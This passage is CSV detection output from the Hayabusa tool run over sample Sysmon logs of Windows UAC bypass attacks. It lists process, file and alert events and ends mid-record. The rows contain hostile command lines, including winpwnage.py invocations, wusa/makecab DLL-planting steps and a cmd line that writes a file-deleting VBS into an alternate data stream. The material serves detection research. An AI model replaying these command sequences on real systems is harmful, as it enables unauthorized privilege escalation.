365ABB72-89A1-5CD3-0000-001013732100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx +2019-05-09 11:07:51.131 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdclt.exe"" /kickoffelev | Process: C:\Windows\System32\sdclt.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13982 | PID: 3836 | PGUID: 365ABB72-8B77-5CD3-0000-0010E8FD2900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UACBypass_SDCLTBypass.evtx +2019-05-09 11:07:51.131 +09:00,IEWIN7,10,low,,Process Access,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\system32\sdclt.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2704 | Src PGUID: 365ABB72-88DC-5CD3-0000-00100DA51A00 | Tgt PID: 3836 | Tgt PGUID: 365ABB72-8B77-5CD3-0000-0010E8FD2900,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UACBypass_SDCLTBypass.evtx +2019-05-09 11:07:56.149 +09:00,IEWIN7,10,low,,Process Access,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\system32\sdclt.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1f1fff | Src PID: 2704 | Src PGUID: 365ABB72-88DC-5CD3-0000-00100DA51A00 | Tgt PID: 3836 | Tgt PGUID: 365ABB72-8B77-5CD3-0000-0010E8FD2900,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UACBypass_SDCLTBypass.evtx +2019-05-09 11:08:00.446 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" /c notepad.exe | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ? 
| LID: 0x1394a | PID: 2264 | PGUID: 365ABB72-8B80-5CD3-0000-001065512A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UACBypass_SDCLTBypass.evtx +2019-05-09 11:08:00.446 +09:00,IEWIN7,1,medium,PrivEsc,Sdclt Child Processes,,rules/sigma/process_creation/proc_creation_win_sdclt_child_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UACBypass_SDCLTBypass.evtx +2019-05-09 11:52:18.765 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\wscript.exe.manifest | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 1900 | PGUID: 365ABB72-9570-5CD3-0000-00103FC90A00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 11:52:18.844 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\makecab.exe"" C:\Users\IEUser\AppData\Local\Temp\wscript.exe.manifest C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp | Process: C:\Windows\System32\makecab.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13add | PID: 1292 | PGUID: 365ABB72-95E2-5CD3-0000-001097410F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 11:52:18.922 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp /extract:C:\Windows /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13add | PID: 3636 | PGUID: 365ABB72-95E2-5CD3-0000-0010C6440F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 11:52:18.953 +09:00,IEWIN7,1,info,,Process Created,"Cmd: 
""C:\Windows\system32\wusa.exe"" ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp /extract:C:\Windows /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13add | PID: 3620 | PGUID: 365ABB72-95E2-5CD3-0000-001083470F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 11:52:18.969 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp /extract:C:\Windows /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13add | PID: 2420 | PGUID: 365ABB72-95E2-5CD3-0000-001074490F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 11:52:19.250 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp /extract:C:\Windows /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13aa4 | PID: 3536 | PGUID: 365ABB72-95E3-5CD3-0000-00100C650F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 11:52:21.250 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\makecab.exe"" C:\Windows\System32\wscript.exe C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp | Process: C:\Windows\System32\makecab.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13add | PID: 3828 | PGUID: 365ABB72-95E5-5CD3-0000-00101F720F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 11:52:21.265 
+09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp /extract:C:\Windows /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13add | PID: 3824 | PGUID: 365ABB72-95E5-5CD3-0000-00108F720F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 11:52:21.281 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wusa.exe"" ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp /extract:C:\Windows /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13add | PID: 2852 | PGUID: 365ABB72-95E5-5CD3-0000-001065730F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 11:52:21.297 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp /extract:C:\Windows /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13add | PID: 2364 | PGUID: 365ABB72-95E5-5CD3-0000-001033750F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 11:52:21.594 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp /extract:C:\Windows /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13aa4 | PID: 2800 | PGUID: 365ABB72-95E5-5CD3-0000-0010E1890F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 
11:52:23.500 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData:tghjx5xz2ky.vbs | Process: C:\Windows\system32\cmd.exe | PID: 2812 | PGUID: 365ABB72-95E7-5CD3-0000-001046950F00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 11:52:23.500 +09:00,IEWIN7,15,info,,Alternate Data Stream Created,Path: C:\Users\IEUser\AppData | Process: C:\Windows\system32\cmd.exe | PID: 2812 | PGUID: 365ABB72-95E7-5CD3-0000-001046950F00 | Hash: Unknown,rules/hayabusa/sysmon/events/15_AlternateDataStreamCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 11:52:23.500 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /C ""echo Dim objShell:Dim oFso:Set oFso = CreateObject(""Scripting.FileSystemObject""):Set objShell = WScript.CreateObject(""WScript.Shell""):command = ""powershell.exe"":objShell.Run command, 0:command = ""C:\Windows\System32\cmd.exe /c """"start /b """""""" cmd /c """"timeout /t 5 >nul&&del C:\Windows\wscript.exe&&del C:\Windows\wscript.exe.manifest"""""""""":objShell.Run command, 0:Set objShell = Nothing > ""C:\Users\IEUser\AppData:tghjx5xz2ky.vbs"""" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13add | PID: 2812 | PGUID: 365ABB72-95E7-5CD3-0000-001046950F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 11:52:23.500 +09:00,IEWIN7,1,low,Evas,Cmd Stream Redirection,,rules/sigma/process_creation/proc_creation_win_redirect_to_stream.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 11:52:23.500 +09:00,IEWIN7,1,low,Disc,Redirect Output in 
CommandLine,,rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 11:52:23.531 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /C ""C:\Windows\wscript.exe ""C:\Users\IEUser\AppData:tghjx5xz2ky.vbs"""" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13add | PID: 3784 | PGUID: 365ABB72-95E7-5CD3-0000-001004970F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 12:25:24.896 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdclt.exe"" | Process: C:\Windows\System32\sdclt.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13add | PID: 3184 | PGUID: 365ABB72-9DA4-5CD3-0000-00102E692F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_UACBypass_AppPath_Control.evtx +2019-05-09 12:25:25.067 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" /name Microsoft.BackupAndRestoreCenter | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\sdclt.exe"" | LID: 0x13add | PID: 2920 | PGUID: 365ABB72-9DA4-5CD3-0000-00107F7A2F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_UACBypass_AppPath_Control.evtx +2019-05-09 12:25:25.067 +09:00,IEWIN7,1,medium,PrivEsc,Sdclt Child Processes,,rules/sigma/process_creation/proc_creation_win_sdclt_child_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_UACBypass_AppPath_Control.evtx +2019-05-10 21:21:57.077 +09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u uac -i 7 -p c:\Windows\System32\cmd.exe | Process: C:\Python27\python.exe | 
User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x13a4f | PID: 4076 | PGUID: 365ABB72-6CE5-5CD5-0000-00104BC61B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_12_11_perfmonUACBypass.evtx +2019-05-10 21:22:02.434 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\system32\mmc.exe | Process: c:\python27\python.exe | PID: 4076 | PGUID: 365ABB72-6CE5-5CD5-0000-00104BC61B00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_12_11_perfmonUACBypass.evtx +2019-05-10 21:22:08.465 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""c:\users\ieuser\appdata\local\temp\system32\mmc.exe"" ""c:\users\ieuser\appdata\local\temp\system32\perfmon.msc"" | Process: C:\Users\IEUser\AppData\Local\Temp\system32\mmc.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\perfmon.exe"" | LID: 0x13a11 | PID: 1644 | PGUID: 365ABB72-6CF0-5CD5-0000-0010140F1C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_12_11_perfmonUACBypass.evtx +2019-05-10 21:22:08.465 +09:00,IEWIN7,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_12_11_perfmonUACBypass.evtx +2019-05-10 22:32:48.200 +09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u uac -i 9 -p c:\Windows\System32\cmd.exe | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x14241 | PID: 2796 | PGUID: 365ABB72-7D80-5CD5-0000-00100AD01300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx +2019-05-10 22:32:48.412 +09:00,IEWIN7,13,high,Persis,Bypass UAC 
Using Event Viewer,,rules/sigma/registry_event/win_re_bypass_uac_using_eventviewer.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx +2019-05-10 22:32:58.549 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""c:\Windows\System32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\CompMgmtLauncher.exe"" | LID: 0x141f8 | PID: 2076 | PGUID: 365ABB72-7D86-5CD5-0000-0010CC2E1400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx +2019-05-10 22:33:29.424 +09:00,IEWIN7,1,info,,Process Created,"Cmd: whoami /priv | Process: C:\Windows\System32\whoami.exe | User: IEWIN7\IEUser | Parent Cmd: ""c:\Windows\System32\cmd.exe"" | LID: 0x141f8 | PID: 2524 | PGUID: 365ABB72-7DA9-5CD5-0000-00100ED31400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx +2019-05-10 22:33:29.424 +09:00,IEWIN7,1,high,PrivEsc | Disc,Run Whoami Showing Privileges,,rules/sigma/process_creation/proc_creation_win_whoami_priv.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx +2019-05-10 22:33:29.424 +09:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx +2019-05-10 22:33:29.424 +09:00,IEWIN7,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx +2019-05-10 22:49:29.586 +09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u uac -i 11 -p c:\Users\IEUser\Desktop\hellox86.dll | 
Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x14241 | PID: 3552 | PGUID: 365ABB72-8169-5CD5-0000-0010D7982300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx +2019-05-10 22:49:29.789 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\NTWDBLIB.dll | Process: c:\python27\python.exe | PID: 3552 | PGUID: 365ABB72-8169-5CD5-0000-0010D7982300,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx +2019-05-10 22:49:29.789 +09:00,IEWIN7,11,medium,,Rename Common File to DLL File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx +2019-05-10 22:49:34.946 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\suspicious.cab | Process: C:\Windows\System32\makecab.exe | PID: 1700 | PGUID: 365ABB72-816E-5CD5-0000-0010FEB62300,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx +2019-05-10 22:49:39.930 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32 /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 11 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x14241 | PID: 3608 | PGUID: 365ABB72-8173-5CD5-0000-00102FCD2300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx +2019-05-10 22:49:40.164 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wusa.exe"" 
c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32 /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 11 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x141f8 | PID: 2676 | PGUID: 365ABB72-8174-5CD5-0000-0010ABE62300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx +2019-05-10 22:49:45.133 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cliconfg.exe"" | Process: C:\Windows\System32\cliconfg.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 11 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x14241 | PID: 1052 | PGUID: 365ABB72-8179-5CD5-0000-00102CFF2300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx +2019-05-10 22:49:45.378 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cliconfg.exe"" | Process: C:\Windows\System32\cliconfg.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 11 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x141f8 | PID: 880 | PGUID: 365ABB72-8179-5CD5-0000-001083182400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx +2019-05-11 18:50:08.248 +09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x136c5 | PID: 1136 | PGUID: 365ABB72-9AD0-5CD6-0000-001077FC1600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx +2019-05-11 18:50:08.491 +09:00,IEWIN7,11,info,,File Created,Path: 
C:\Users\IEUser\AppData\Local\Temp\CRYPTBASE.dll | Process: c:\python27\python.exe | PID: 1136 | PGUID: 365ABB72-9AD0-5CD6-0000-001077FC1600,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx +2019-05-11 18:50:08.491 +09:00,IEWIN7,11,medium,,Rename Common File to DLL File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx +2019-05-11 18:50:13.494 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\makecab.exe"" c:\users\ieuser\appdata\local\temp\CRYPTBASE.dll c:\users\ieuser\appdata\local\temp\suspicious.cab | Process: C:\Windows\System32\makecab.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x136c5 | PID: 3716 | PGUID: 365ABB72-9AD5-5CD6-0000-0010C4131700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx +2019-05-11 18:50:13.509 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\suspicious.cab | Process: C:\Windows\System32\makecab.exe | PID: 3716 | PGUID: 365ABB72-9AD5-5CD6-0000-0010C4131700,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx +2019-05-11 18:50:18.404 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\ehome /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x136c5 | PID: 2780 | PGUID: 
365ABB72-9ADA-5CD6-0000-001012231700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx +2019-05-11 18:50:18.654 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\ehome /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x1369b | PID: 3448 | PGUID: 365ABB72-9ADA-5CD6-0000-0010603C1700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx +2019-05-11 18:50:26.779 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\ehome\mcx2prov.exe"" | Process: C:\Windows\ehome\Mcx2Prov.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x136c5 | PID: 2936 | PGUID: 365ABB72-9AE2-5CD6-0000-00106D631700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx +2019-05-11 18:50:27.018 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\ehome\mcx2prov.exe"" | Process: C:\Windows\ehome\Mcx2Prov.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x1369b | PID: 2688 | PGUID: 365ABB72-9AE2-5CD6-0000-0010337C1700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx +2019-05-11 18:50:27.030 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Possible UAC Bypass - mcx2prov DLL | Image: C:\Windows\ehome\CRYPTBASE.dll | Process: C:\Windows\ehome\Mcx2Prov.exe | Company: ? 
| Signed: false | Signature: Unavailable | PID: 2688 | PGUID: 365ABB72-9AE2-5CD6-0000-0010337C1700 | Hash: SHA1=AA3BF7118AE8138859FC0EE9202684C6DA22C176,MD5=3F090AA1CAE8B179F93B2064B8609AE2,SHA256=AC1DD32C41F6002BDF2EB564653FF23E069594CE55F9E22093355084EE28A6FD,IMPHASH=10D8CBCC4D9E244D697F1C09224856DC",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx +2019-05-12 01:46:10.125 +09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u uac -i 13 -p c:\Users\IEUser\Desktop\hellox86.dll | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x13765 | PID: 3812 | PGUID: 365ABB72-FC52-5CD6-0000-0010357F1200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx +2019-05-12 01:46:10.344 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\CRYPTBASE.dll | Process: 